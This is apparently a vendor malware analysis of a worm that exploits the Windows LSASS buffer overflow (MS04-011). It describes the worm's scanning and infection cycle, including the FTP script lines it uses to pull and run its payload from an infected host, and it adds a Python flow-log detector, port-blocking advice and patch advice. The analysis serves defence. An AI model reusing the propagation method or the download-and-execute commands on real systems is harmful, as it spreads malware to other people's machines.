This 32-bit virus has a packed file size of 15,872 bytes and was coded using Visual C++. Its only purpose is to spread to other systems across the Internet as quickly as possible. It does so by exploiting a buffer overflow vulnerability in the Local Security Authority Subsystem Service (LSASS) [ref: MS04-011 and CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus will bind to TCP port 5554 and act as an FTP server. It will then send SYN packets to random IP addresses across the Internet on destination TCP port 445. IP addresses which are live will respond with an "ACK" packet. The virus then targets that IP address by launching its LSASS exploit code in an effort to gain access to the system. If the target can be compromised, the virus writes into the IPC$ share an FTP script file which requests the virus from the infected system. The virus is downloaded from TCP port 5554 on the infected system to the target. The file received is then executed, and the cycle
Loading At Windows Startup
If this virus is run, it will copy itself to the Windows folder and register itself to run at each Windows startup -
"avserve.exe" = C:\WINNT\avserve.exe
While the virus is memory resident, it creates a Mutex reference named "Jobaka31".
Virus Delivery Through FTP
On an infected system, the virus may write files with random names, but in a specific format, into the System32 folder, such as these -
The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates the file "c:\win.log" and writes the infected system's IP address into it. If the virus is able to compromise a target, it opens a remote shell on the target on TCP port 9996. Next, the virus writes an FTP script file named "cmd.ftp" with the following instructions -
open <IP address of infected system> 5554
The virus remotely executes the FTP script using the instruction "ftp -s:cmd.ftp". When the file is retrieved to the target system, it is executed and the "cmd.ftp" script is then deleted.
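The propagation sequence described above (SYN probes of TCP/445, a shell on TCP/9996, then a pull from the infected host's TCP/5554 FTP emulation) leaves a recognisable pattern in flow logs. The following is an added detection example, not code from the original write-up; the flow-record format, the constructed sample records and the threshold of five distinct TCP/445 targets are assumptions.

```python
from collections import defaultdict

SCAN_PORT, FTP_PORT, SHELL_PORT = 445, 5554, 9996  # LSASS probe, worm FTP, remote shell
SYN_THRESHOLD = 5  # distinct TCP/445 targets from one source before it is flagged (assumed)

# Constructed flow records (not real capture data): "src dst dport flags", TCP only.
SAMPLE_FLOWS = """\
192.168.1.20 10.3.7.2 445 S
192.168.1.20 10.88.1.9 445 S
192.168.1.20 172.19.4.40 445 S
192.168.1.20 198.51.100.7 445 S
192.168.1.20 203.0.113.55 445 S
192.168.1.20 10.200.3.3 445 S
192.168.1.20 10.3.7.2 9996 S
10.3.7.2 192.168.1.20 5554 S
192.168.1.50 192.168.1.10 445 S
192.168.1.50 93.184.216.34 443 S
"""

def parse_flows(text):
    """Parse 'src dst dport flags' lines into (src, dst, dport, flags) tuples."""
    return [(s, d, int(p), fl) for s, d, p, fl in
            (line.split() for line in text.splitlines() if line.strip())]

def find_suspects(flows, syn_threshold=SYN_THRESHOLD):
    """Return {host: [reasons]} for hosts whose traffic matches the worm's cycle."""
    scan_targets = defaultdict(set)  # src -> hosts it sent a SYN to on 445
    shell_peers = defaultdict(set)   # src -> hosts it connected to on 9996
    ftp_clients = defaultdict(set)   # server -> hosts that pulled from its port 5554
    for src, dst, dport, flags in flows:
        if dport == SCAN_PORT and flags == "S":
            scan_targets[src].add(dst)
        elif dport == SHELL_PORT:
            shell_peers[src].add(dst)
        elif dport == FTP_PORT:
            ftp_clients[dst].add(src)  # the host serving 5554 is the infected one
    suspects = {}
    for host in set(scan_targets) | set(shell_peers) | set(ftp_clients):
        reasons = []
        if len(scan_targets[host]) >= syn_threshold:
            reasons.append(f"SYN scan of TCP/{SCAN_PORT} against {len(scan_targets[host])} hosts")
        if shell_peers[host]:
            reasons.append(f"connected to TCP/{SHELL_PORT} on {sorted(shell_peers[host])}")
        if ftp_clients[host]:
            reasons.append(f"served TCP/{FTP_PORT} to {sorted(ftp_clients[host])}")
        if reasons:
            suspects[host] = reasons
    return suspects

if __name__ == "__main__":
    print(find_suspects(parse_flows(SAMPLE_FLOWS)))
```

A single SYN to a legitimate file server on TCP/445 (192.168.1.50 in the sample) stays below the threshold and is not reported; only the host showing the scan, shell and FTP phases together is flagged.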
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push
- Using the FortiGate manager, block external to internal traffic using UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, 593, 5554 and 9996
- For Windows XP users, implement use of Personal Firewall - this feature automatically blocks unsolicited inbound traffic and would protect against this Internet
- Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011